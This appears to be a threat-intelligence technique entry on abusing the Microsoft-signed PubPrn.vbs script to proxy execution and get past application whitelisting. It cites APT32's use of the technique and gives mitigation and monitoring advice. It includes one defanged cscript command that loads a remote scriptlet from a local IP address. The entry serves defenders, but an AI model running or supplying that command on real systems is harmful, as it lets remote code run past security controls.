Signed Script Proxy Execution
Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.  Example command:
cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
There are several other signed scripts that may be used in a similar manner. 
|APT32||APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses. |
|Execution Prevention||Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.|
Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.